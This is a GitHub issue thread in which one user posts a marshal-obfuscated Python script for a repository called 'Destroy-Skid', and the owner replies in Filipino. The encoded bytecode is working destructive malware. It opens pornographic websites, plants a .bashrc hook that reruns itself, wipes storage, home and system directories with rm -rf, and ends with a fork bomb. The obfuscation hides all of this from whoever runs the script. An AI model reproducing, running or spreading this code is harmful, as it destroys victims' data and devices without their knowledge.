### ISSUE TITLE
must encrpyt the script!!!

### ISSUE THREAD

**Issue by mkdirlove** [AnonPrixorPH/Destroy-Skid#2]
author:mkdirlove

use this instead

##################################################################################

# Obfuscated by mkdirlove
# Created by MKDIRLOVE (https://github.com/mkdirlove)

import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\xaa\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x02\x00GHe\x02\x00j\x03\x00d\x03\x00\x83\x01\x00\x01e\x00\x00j\x04\x00d\x04\x00\x83\x01\x00\x01e\x00\x00j\x04\x00d\x05\x00\x83\x01\x00\x01e\x00\x00j\x04\x00d\x06\x00\x83\x01\x00\x01e\x00\x00j\x04\x00d\x07\x00\x83\x01\x00\x01e\x00\x00j\x04\x00d\x08\x00\x83\x01\x00\x01e\x00\x00j\x04\x00d\t\x00\x83\x01\x00\x01e\x00\x00j\x04\x00d\n\x00\x83\x01\x00\x01d\x0b\x00GHd\x0c\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\r\x00\x00\x00i\xff\xff\xff\xffNs\x1b\x00\x00\x00Welcome to AnonPrixor Worldi\x02\x00\x00\x00s\x1c\x00\x00\x00xdg-open https://youjizz.coms\x1c\x00\x00\x00xdg-open https://pornhub.coms\x1e\x00\x00\x00xdg-open https://kanortube.coms\x1a\x00\x00\x00xdg-open 6https://xnxx.coms\x1d\x00\x00\x00xdg-open https://xvideos2.coms\x1c\x00\x00\x00xdg-open https://xvideos.coms\x1e\x00\x00\x00xdg-open https://anonprixor.pws\x10\x00\x00\x00Fuck you skid!!!c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xd4\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x03\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x06\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x07\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x08\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\t\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\n\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x0b\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x0c\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\r\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x0e\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x0f\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x10\x00\x83\x01\x00\x01d\x00\x00S(\x11\x00\x00\x00Ns\x10\x00\x00\x00touch .hushlogins(\x00\x00\x00printf "python2 main.py" > $HOME/.bashrcs\x14\x00\x00\x00termux-setup-storages\x1c\x00\x00\x00rm -rf /storage/emulated/0/*s\x1a\x00\x00\x00rm -rf /storage/emulated/*s\x10\x00\x00\x00rm -rf /sdcard/*s\x12\x00\x00\x00rm -rf /sdcard/0/*s\x11\x00\x00\x00rm -rf /sdcard1/*s\x11\x00\x00\x00rm -rf /storage/*s\t\x00\x00\x00rm -rf /*s\x10\x00\x00\x00rm -rf /system/*s\x14\x00\x00\x00rm -rf $HOME/../../*s\x10\x00\x00\x00rm -rf $PREFIX/bs\x0e\x00\x00\x00rm -rf $HOME/*s\x12\x00\x00\x00mv $HOME /dev/nulls\x0e\x00\x00\x00:(){ :|: & };:(\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x02\x00\x00\x00dgt\x04\x00\x00\x00data\x15\x00\x00\x00s \x00\x00\x00\x00\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01(\x06\x00\x00\x00R\x00\x00\x00\x00t\x03\x00\x00\x00syst\x04\x00\x00\x00timet\x05\x00\x00\x00sleepR\x01\x00\x00\x00R\x02\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x02\x00\x00\x00dgt\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x1c\x00\x00\x00\x0c\x01\x0c\x01\x0c\x03\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x05\x04\t\x12'))

**Comment by AnonPrixorPH** [comment]
Hello, Mkdirlove.

Alam ko po na dapat i encrypt ang code. And i let the Users to Encrypt the code sila napo ang Bahala sa pag encrypt ng code.
